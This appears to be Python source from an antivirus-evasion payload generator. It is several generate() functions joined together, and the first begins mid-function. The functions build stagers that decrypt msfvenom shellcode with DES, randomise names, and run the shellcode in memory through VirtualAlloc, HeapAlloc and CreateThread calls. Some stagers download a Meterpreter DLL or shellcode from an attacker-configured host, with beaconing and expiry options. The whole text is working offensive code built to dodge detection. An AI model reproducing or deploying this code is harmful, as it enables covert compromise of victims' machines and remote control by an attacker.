RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandReverseShell + ' = \"' + Shellcode + '\"\n' PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n' PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += '\t' + RandShellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): payloadCode = "import urllib2, string, random, struct, ctypes, httplib, time\n" # randomize everything, yo' sumMethodName = helpers.randomString() checkinMethodName = helpers.randomString() randLettersName = helpers.randomString() randLetterSubName = helpers.randomString() randBaseName = helpers.randomString() downloadMethodName = helpers.randomString() hostName = helpers.randomString() portName = helpers.randomString() requestName = helpers.randomString() tName = helpers.randomString() injectMethodName = helpers.randomString() dataName = helpers.randomString() byteArrayName = helpers.randomString() ptrName = helpers.randomString() bufName = helpers.randomString() handleName = helpers.randomString() data2Name = helpers.randomString() proxy_var = helpers.randomString() opener_var = helpers.randomString() # helper method that returns the sum of all ord values in a string % 0x100 payloadCode += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" % ( sumMethodName) # method that generates a new checksum value for checkin to the meterpreter handler payloadCode += "def %s():\n\tfor x in xrange(64):\n" % ( checkinMethodName) payloadCode += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" % ( randBaseName) payloadCode += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" % ( randLettersName) payloadCode += "\t\tfor %s in %s:\n" % (randLetterSubName, randLettersName) payloadCode += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" % ( sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName) # method that connects to a host/port over https and downloads the hosted data payloadCode += "def %s(%s,%s):\n" % (downloadMethodName, hostName, portName) payloadCode += "\t" + proxy_var + " = urllib2.ProxyHandler()\n" payloadCode += "\t" + opener_var + " = urllib2.build_opener(" + proxy_var + ")\n" payloadCode += "\turllib2.install_opener(" + opener_var + ")\n" payloadCode += "\t%s = urllib2.Request(\"https://%%s:%%s/%%s\" %%(%s,%s,%s()), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n" % ( requestName, hostName, portName, checkinMethodName) payloadCode += "\ttry:\n" payloadCode += "\t\t%s = urllib2.urlopen(%s)\n" % (tName, requestName) payloadCode += "\t\ttry:\n" payloadCode += "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" % ( tName, tName) payloadCode += "\t\t\telse: return ''\n" payloadCode += "\t\texcept: return %s.read()\n" % (tName) payloadCode += "\texcept urllib2.URLError, e: return ''\n" # method to inject a reflective .dll into memory payloadCode += "def %s(%s):\n" % (injectMethodName, dataName) payloadCode += "\tif %s != \"\":\n" % (dataName) payloadCode += "\t\t%s = bytearray(%s)\n" % (byteArrayName, dataName) payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)), ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" % ( ptrName, byteArrayName) payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" % ( bufName, byteArrayName, byteArrayName) payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s),%s, ctypes.c_int(len(%s)))\n" % ( ptrName, bufName, byteArrayName) payloadCode += "\t\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" % ( handleName, ptrName) payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" % ( handleName) # download the metpreter .dll and inject it payloadCode += "%s = ''\n" % (data2Name) payloadCode += "%s = %s(\"%s\", %s)\n" % ( data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0]) payloadCode += "%s(%s)\n" % (injectMethodName, data2Name) if self.required_options["use_pyherion"][0].lower() == "y": payloadCode = encryption.pyherion(payloadCode) return payloadCode
def generate(self): if self.required_options["INJECT_METHOD"][0].lower() == "virtual": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandDESKey = helpers.randomString() RandDESPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode) # Create Payload File PayloadCode = 'from Crypto.Cipher import DES\n' PayloadCode += 'import ctypes as avlol\n' PayloadCode += RandIV + ' = \'' + iv + '\'\n' PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n' PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n' PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n' PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n' PayloadCode += RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len('+ ShellcodeVariableName +')),avlol.c_int(0x3000),avlol.c_int(0x40))\n' PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandDESKey = helpers.randomString() RandDESPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode) # Create Payload File PayloadCode = 'from Crypto.Cipher import DES\n' PayloadCode += 'import ctypes as avlol\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n' PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n' PayloadCode += '\t' + RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n' PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n' PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n' PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len('+ ShellcodeVariableName +')),avlol.c_int(0x3000),avlol.c_int(0x40))\n' PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode if self.required_options["INJECT_METHOD"][0].lower() == "heap": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandDESKey = helpers.randomString() RandDESPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() HeapVar = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode) # Create Payload File PayloadCode = 'from Crypto.Cipher import DES\n' PayloadCode += 'import ctypes as avlol\n' PayloadCode += RandIV + ' = \'' + iv + '\'\n' PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n' PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n' PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n' PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n' PayloadCode += HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n' PayloadCode += RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandDESKey = helpers.randomString() RandDESPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() HeapVar = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode) # Create Payload File PayloadCode = 'from Crypto.Cipher import DES\n' PayloadCode += 'import ctypes as avlol\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n' PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n' PayloadCode += '\t' + RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n' PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n' PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n' PayloadCode += '\t' + HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n' PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandDESKey = helpers.randomString() RandDESPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode) # Create Payload File PayloadCode = 'from Crypto.Cipher import DES\n' PayloadCode += 'from ctypes import *\n' PayloadCode += RandIV + ' = \'' + iv + '\'\n' PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n' PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n' PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n' PayloadCode += ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n' PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandDESKey = helpers.randomString() RandDESPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode) # Create Payload File PayloadCode = 'from Crypto.Cipher import DES\n' PayloadCode += 'from ctypes import *\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n' PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n' PayloadCode += '\t' + RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n' PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n' PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n' PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += '\t' + RandShellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): imports = "import sys; import urllib2; import ctypes; import time; import signal; import threading\n" inject_func = helpers.randomString() getexec_func = helpers.randomString() main_func = helpers.randomString() beaconthr_func = helpers.randomString() retry_var = helpers.randomString() if self.required_options["BEACON"][0].lower() == 'n': global_vars = "%s = False" % retry_var elif self.required_options["BEACON"][0].lower() == 'y': global_vars = "%s = True" % retry_var interval_var = helpers.randomString() opener_var = helpers.randomString() global_vars += "\n%s = %s" % ( interval_var, self.required_options["BEACON_SECONDS"][0]) global_vars += "\n%s = urllib2.build_opener()\n" % (opener_var) shellcode_var = helpers.randomString() ptr_var = helpers.randomString() ht_var = helpers.randomString() buff_var = helpers.randomString() inject = "def %s(%s):" % (inject_func, shellcode_var) inject += "\n\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))" % ( ptr_var, shellcode_var) inject += "\n\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))" % ( ptr_var, shellcode_var) inject += "\n\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)" % ( buff_var, shellcode_var, shellcode_var) inject += "\n\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))" % ( ptr_var, buff_var, shellcode_var) inject += "\n\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))" % ( ht_var, ptr_var) inject += "\n\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" % ht_var url_var = helpers.randomString() shellcode_var = helpers.randomString() info_var = helpers.randomString() thread_var = helpers.randomString() thread_name = helpers.randomString() thread_name2 = helpers.randomString() getexec = "def %s(%s):" % (getexec_func, url_var) getexec += "\n\ttry:" getexec += "\n\t\t%s = %s.open(%s)" % (info_var, opener_var, url_var) getexec += "\n\t\t%s = %s.read()" % (shellcode_var, info_var) getexec += "\n\t\t%s = bytearray(%s)" % (shellcode_var, shellcode_var) getexec += "\n\t\t%s(%s)" % (inject_func, shellcode_var) getexec += "\n\texcept Exception:" getexec += "\n\t\tpass\n" url_var = helpers.randomString() beaconthr = "def %s(%s):" % (beaconthr_func, url_var) beaconthr += "\n\twhile True:" beaconthr += "\n\t\ttime.sleep(%s)" % interval_var beaconthr += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % ( thread_var, thread_name, getexec_func, url_var) beaconthr += "\n\t\t%s.setDaemon(True)" % thread_var beaconthr += "\n\t\t%s.start()\n" % thread_var main = "def %s():" % main_func main += "\n\t%s = 'http://%s:%s/%s'" % ( url_var, self.required_options['DOWNLOAD_HOST'][0], self.required_options['DOWNLOAD_PORT'][0], self.required_options['DOWNLOAD_NAME'][0]) main += "\n\tif %s is True:" % retry_var main += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % ( thread_var, thread_name, beaconthr_func, url_var) main += "\n\t\t%s.setDaemon(True)" % thread_var main += "\n\t\t%s.start()" % thread_var main += "\n\t%s(%s)" % (getexec_func, url_var) if self.required_options["BEACON"][0].lower() == 'y': main += "\n\twhile True:" main += "\n\t\ttime.sleep(0.1)" main += "\nif __name__ == '__main__':" main += "\n\t%s()" % main_func PayloadCode = imports + global_vars + inject + getexec + beaconthr + main if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode